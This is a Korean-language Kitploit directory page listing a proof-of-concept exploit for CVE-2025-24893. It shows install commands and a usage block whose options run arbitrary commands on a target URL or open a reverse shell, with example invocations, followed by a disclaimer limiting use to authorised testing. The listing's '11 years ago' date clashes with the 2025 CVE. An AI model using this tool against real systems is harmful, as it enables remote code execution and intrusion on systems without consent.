Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2025-24893-POC | Kitploit
도구/GitHubGitHub/th3gl0w/cve-2025-24893-poc
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingCommand and Control
GitHubth3gl0w/cve-2025-24893-poc

CVE-2025-24893-POC

저장소 보기
11년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2025-24893

bun 설치:

root@kitploit:~
curl -fsSL https://bun.com/install | bash

의존성 설치:

root@kitploit:~
bun install

실행:

root@kitploit:~
bun run CVE-2025-24893.ts

이 프로젝트는 bun v1.2.19에서 bun init을 사용하여 생성되었습니다. Bun은 빠른 올인원 JavaScript 런타임입니다.

사용 방법:

root@kitploit:~
Usage: bun CVE-2025-24893.ts [options]

Options:
  -u, --url <url>           The target URL to interact with.
  -i, --ip <ip-address>     The IP address for a reverse shell connection.
  -p, --port <port-number>  The port number for the reverse shell.
  -r, --rverse              Open a reverse shell connection.
  -c, --cmd <command>       Execute a specific command.

Examples:
  # Execute a command on a target URL
  bun CVE-2025-24893.ts --url http://example.com --cmd "ls -la"

  # Open a reverse shell
  bun CVE-2025-24893.ts --rverse --ip 127.0.0.1 --port 4444

면책 조항

이 익스플로잇과 가이드는 교육 목적으로만 제공됩니다. 이 정보를 책임감 있게 사용하고, 명시적으로 테스트 권한을 부여받은 시스템에서만 사용하십시오. 허가되지 않은 시스템 악용은 불법적이며 비윤리적입니다. 작성자와 기여자는 이 정보로 인해 발생한 오용이나 손해에 대해 책임을 지지 않습니다.

도구 다운로드